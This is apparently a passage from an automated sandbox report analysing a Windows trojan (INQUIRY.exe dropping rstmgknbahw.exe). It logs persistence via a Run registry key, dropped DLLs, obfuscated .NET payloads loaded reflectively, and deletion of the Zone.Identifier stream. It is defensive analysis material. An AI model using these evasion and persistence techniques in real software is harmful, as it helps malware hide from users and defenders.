      Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exeCode function: 6_2_049E306F6_2_049E306F
      Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exeCode function: 6_1_0040A2A56_1_0040A2A5
      Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exeCode function: String function: 00401ED0 appears 92 times
      Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exeCode function: String function: 004056B5 appears 32 times
      Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exeCode function: String function: 0040569E appears 72 times
      Source: INQUIRY.exe, 00000001.00000003.654638153.00000000034CF000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs INQUIRY.exe
      Source: INQUIRY.exe, 00000001.00000003.658531644.0000000003336000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs INQUIRY.exe
      Source: INQUIRY.exe, 00000002.00000002.918484295.0000000002911000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameClientPlugin.dll4 vs INQUIRY.exe
      Source: INQUIRY.exe, 00000002.00000002.918797240.00000000039A2000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameSurveillanceExClientPlugin.dll4 vs INQUIRY.exe
      Source: INQUIRY.exe, 00000002.00000002.918797240.00000000039A2000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameLzma#.dll4 vs INQUIRY.exe
      Source: INQUIRY.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
      Source: rstmgknbahw.exe.1.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
      Source: C:\Users\user\Desktop\INQUIRY.exeFile read: C:\Users\user\Desktop\INQUIRY.exeJump to behavior
      Source: INQUIRY.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
      Source: C:\Users\user\Desktop\INQUIRY.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: unknownProcess created: C:\Users\user\Desktop\INQUIRY.exe "C:\Users\user\Desktop\INQUIRY.exe"
      Source: C:\Users\user\Desktop\INQUIRY.exeProcess created: C:\Users\user\Desktop\INQUIRY.exe "C:\Users\user\Desktop\INQUIRY.exe"
      Source: unknownProcess created: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe "C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe"
      Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exeProcess created: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe "C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe"
      Source: unknownProcess created: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe "C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe"
      Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exeProcess created: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe "C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe"
      Source: C:\Users\user\Desktop\INQUIRY.exeProcess created: C:\Users\user\Desktop\INQUIRY.exe "C:\Users\user\Desktop\INQUIRY.exe" Jump to behavior
      Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exeProcess created: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe "C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe" Jump to behavior
      Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exeProcess created: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe "C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe" Jump to behavior
      Source: C:\Users\user\Desktop\INQUIRY.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
      Source: C:\Users\user\Desktop\INQUIRY.exeFile created: C:\Users\user\AppData\Roaming\sspgadrjncoyJump to behavior
      Source: C:\Users\user\Desktop\INQUIRY.exeFile created: C:\Users\user\AppData\Local\Temp\nsc48D4.tmpJump to behavior
      Source: classification engineClassification label: mal100.troj.evad.winEXE@9/12@20/1
      Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 1_2_00402012 CoCreateInstance,MultiByteToWideChar,1_2_00402012
      Source: C:\Users\user\Desktop\INQUIRY.exeFile read: C:\Users\desktop.iniJump to behavior
      Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 1_2_00404275 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,1_2_00404275
      Source: 4.2.rstmgknbahw.exe.49d0000.9.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
      Source: 4.2.rstmgknbahw.exe.49d0000.9.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
      Source: 2.2.INQUIRY.exe.2520000.4.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
      Source: 2.2.INQUIRY.exe.2520000.4.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
      Source: 6.2.rstmgknbahw.exe.4980000.9.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
      Source: 6.2.rstmgknbahw.exe.4980000.9.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
      Source: C:\Users\user\Desktop\INQUIRY.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dllJump to behavior
      Source: C:\Users\user\Desktop\INQUIRY.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlpJump to behavior
      Source: C:\Users\user\Desktop\INQUIRY.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlpJump to behavior
      Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dllJump to behavior
      Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dllJump to behavior
      Source: C:\Users\user\Desktop\INQUIRY.exeMutant created: \Sessions\1\BaseNamedObjects\Global\{b46b5964-4830-4c6b-9df5-a21557a1e56d}
      Source: C:\Users\user\Desktop\INQUIRY.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
      Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exeCode function: 4_2_00401489 GetModuleHandleW,GetModuleHandleW,FindResourceW,GetModuleHandleW,LoadResource,LockResource,GetModuleHandleW,SizeofResource,FreeResource,ExitProcess,4_2_00401489
      Source: 2.2.INQUIRY.exe.2520000.4.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
      Source: 2.2.INQUIRY.exe.2520000.4.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.csCryptographic APIs: 'CreateDecryptor'
      Source: 2.2.INQUIRY.exe.2520000.4.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.csCryptographic APIs: 'TransformFinalBlock'
      Source: 4.2.rstmgknbahw.exe.49d0000.9.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
      Source: 4.2.rstmgknbahw.exe.49d0000.9.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.csCryptographic APIs: 'CreateDecryptor'
      Source: 4.2.rstmgknbahw.exe.49d0000.9.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.csCryptographic APIs: 'TransformFinalBlock'
      Source: 6.2.rstmgknbahw.exe.4980000.9.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.csCryptographic APIs: 'CreateDecryptor'
      Source: 6.2.rstmgknbahw.exe.4980000.9.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.csCryptographic APIs: 'TransformFinalBlock'
      Source: 6.2.rstmgknbahw.exe.4980000.9.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
      Source: C:\Users\user\Desktop\INQUIRY.exeFile opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dllJump to behavior
      Source: C:\Users\user\Desktop\INQUIRY.exeFile opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_d08c58b4442ba54f\MSVCR80.dllJump to behavior
      Source: Binary string: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.pdb source: INQUIRY.exe, 00000002.00000002.918475302.00000000025C7000.00000004.00000040.sdmp
      Source: Binary string: C:\Windows\mscorlib.pdb] source: INQUIRY.exe, 00000002.00000002.918475302.00000000025C7000.00000004.00000040.sdmp
      Source: Binary string: mscorlib.pdb source: INQUIRY.exe, 00000002.00000002.918475302.00000000025C7000.00000004.00000040.sdmp
      Source: Binary string: mscorlib.pdbX source: INQUIRY.exe, 00000002.00000002.918475302.00000000025C7000.00000004.00000040.sdmp
      Source: Binary string: wntdll.pdbUGP source: INQUIRY.exe, 00000001.00000003.662943536.00000000033B0000.00000004.00000001.sdmp, INQUIRY.exe, 00000001.00000003.659087283.0000000003220000.00000004.00000001.sdmp, rstmgknbahw.exe, 00000003.00000003.702841984.00000000030F0000.00000004.00000001.sdmp, rstmgknbahw.exe, 00000003.00000003.698655774.0000000003280000.00000004.00000001.sdmp, rstmgknbahw.exe, 00000005.00000003.709826822.00000000030E0000.00000004.00000001.sdmp, rstmgknbahw.exe, 00000005.00000003.711484064.0000000003270000.00000004.00000001.sdmp
      Source: Binary string: wntdll.pdb source: INQUIRY.exe, 00000001.00000003.662943536.00000000033B0000.00000004.00000001.sdmp, INQUIRY.exe, 00000001.00000003.659087283.0000000003220000.00000004.00000001.sdmp, rstmgknbahw.exe, 00000003.00000003.702841984.00000000030F0000.00000004.00000001.sdmp, rstmgknbahw.exe, 00000003.00000003.698655774.0000000003280000.00000004.00000001.sdmp, rstmgknbahw.exe, 00000005.00000003.709826822.00000000030E0000.00000004.00000001.sdmp, rstmgknbahw.exe, 00000005.00000003.711484064.0000000003270000.00000004.00000001.sdmp
      Source: Binary string: indows\mscorlib.pdbpdblib.pdb source: INQUIRY.exe, 00000002.00000002.918475302.00000000025C7000.00000004.00000040.sdmp
      Source: Binary string: \??\C:\Windows\mscorlib.pdb source: INQUIRY.exe, 00000002.00000002.918001760.0000000000807000.00000004.00000020.sdmp
      Source: Binary string: C:\Windows\dll\mscorlib.pdb source: INQUIRY.exe, 00000002.00000002.918475302.00000000025C7000.00000004.00000040.sdmp
      Source: Binary string: rlib.pdb source: INQUIRY.exe, 00000002.00000002.918475302.00000000025C7000.00000004.00000040.sdmp
      Source: Binary string: C:\Windows\symbols\dll\mscorlib.pdb source: INQUIRY.exe, 00000002.00000002.918475302.00000000025C7000.00000004.00000040.sdmp

      Data Obfuscation

      barindex
      Source: C:\Users\user\Desktop\INQUIRY.exeUnpacked PE file: 2.2.INQUIRY.exe.2520000.4.unpack
      Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exeUnpacked PE file: 6.2.rstmgknbahw.exe.4980000.9.unpack
      Source: 2.2.INQUIRY.exe.2520000.4.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
      Source: 2.2.INQUIRY.exe.2520000.4.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
      Source: 4.2.rstmgknbahw.exe.49d0000.9.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
      Source: 4.2.rstmgknbahw.exe.49d0000.9.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
      Source: 6.2.rstmgknbahw.exe.4980000.9.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
      Source: 6.2.rstmgknbahw.exe.4980000.9.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
      Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 2_3_008166AD push edi; iretd 2_3_00816D7C
      Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 2_3_008166AD push edi; iretd 2_3_00816D7C
      Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 2_3_008166AD push edi; iretd 2_3_00816D7C
      Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 2_3_00812001 pushad ; iretd 2_3_00812003
      Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 2_3_00812001 pushad ; iretd 2_3_00812003
      Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 2_3_00812001 pushad ; iretd 2_3_00812003
      Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 2_3_00813A15 pushfd ; iretd 2_3_00813BDB
      Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 2_3_00813A15 pushfd ; iretd 2_3_00813BDB
      Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 2_3_00813A15 pushfd ; iretd 2_3_00813BDB
      Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 2_3_00812145 push eax; iretd 2_3_00812183
      Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 2_3_00812145 push eax; iretd 2_3_00812183
      Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 2_3_00812145 push eax; iretd 2_3_00812183
      Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 2_3_008166AD push edi; iretd 2_3_00816D7C
      Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 2_3_008166AD push edi; iretd 2_3_00816D7C
      Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 2_3_008166AD push edi; iretd 2_3_00816D7C
      Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 2_3_00812001 pushad ; iretd 2_3_00812003
      Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 2_3_00812001 pushad ; iretd 2_3_00812003
      Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 2_3_00812001 pushad ; iretd 2_3_00812003
      Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 2_3_00813A15 pushfd ; iretd 2_3_00813BDB
      Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 2_3_00813A15 pushfd ; iretd 2_3_00813BDB
      Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 2_3_00813A15 pushfd ; iretd 2_3_00813BDB
      Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 2_3_00812145 push eax; iretd 2_3_00812183
      Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 2_3_00812145 push eax; iretd 2_3_00812183
      Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 2_3_00812145 push eax; iretd 2_3_00812183
      Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 2_3_008166AD push edi; iretd 2_3_00816D7C
      Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 2_3_008166AD push edi; iretd 2_3_00816D7C
      Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 2_3_008166AD push edi; iretd 2_3_00816D7C
      Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 2_3_00812001 pushad ; iretd 2_3_00812003
      Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 2_3_00812001 pushad ; iretd 2_3_00812003
      Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 2_3_00812001 pushad ; iretd 2_3_00812003
      Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 2_3_00813A15 pushfd ; iretd 2_3_00813BDB
      Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 1_2_00405DA3 GetModuleHandleA,LoadLibraryA,GetProcAddress,1_2_00405DA3
      Source: 2.2.INQUIRY.exe.2520000.4.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.csHigh entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
      Source: 2.2.INQUIRY.exe.2520000.4.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.csHigh entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'
      Source: 4.2.rstmgknbahw.exe.49d0000.9.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.csHigh entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
      Source: 4.2.rstmgknbahw.exe.49d0000.9.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.csHigh entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'
      Source: 6.2.rstmgknbahw.exe.4980000.9.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.csHigh entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
      Source: 6.2.rstmgknbahw.exe.4980000.9.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.csHigh entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'
      Source: C:\Users\user\Desktop\INQUIRY.exeFile created: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exeJump to dropped file
      Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exeFile created: C:\Users\user\AppData\Local\Temp\nsz814B.tmp\gerys.dllJump to dropped file
      Source: C:\Users\user\Desktop\INQUIRY.exeFile created: C:\Users\user\AppData\Local\Temp\nsc48D6.tmp\gerys.dllJump to dropped file
      Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exeFile created: C:\Users\user\AppData\Local\Temp\nsv9D9D.tmp\gerys.dllJump to dropped file
      Source: C:\Users\user\Desktop\INQUIRY.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run earywJump to behavior
      Source: C:\Users\user\Desktop\INQUIRY.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run earywJump to behavior

      Hooking and other Techniques for Hiding and Protection

      barindex
      Source: C:\Users\user\Desktop\INQUIRY.exeFile opened: C:\Users\user\Desktop\INQUIRY.exe:Zone.Identifier read attributes | deleteJump to behavior
      Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
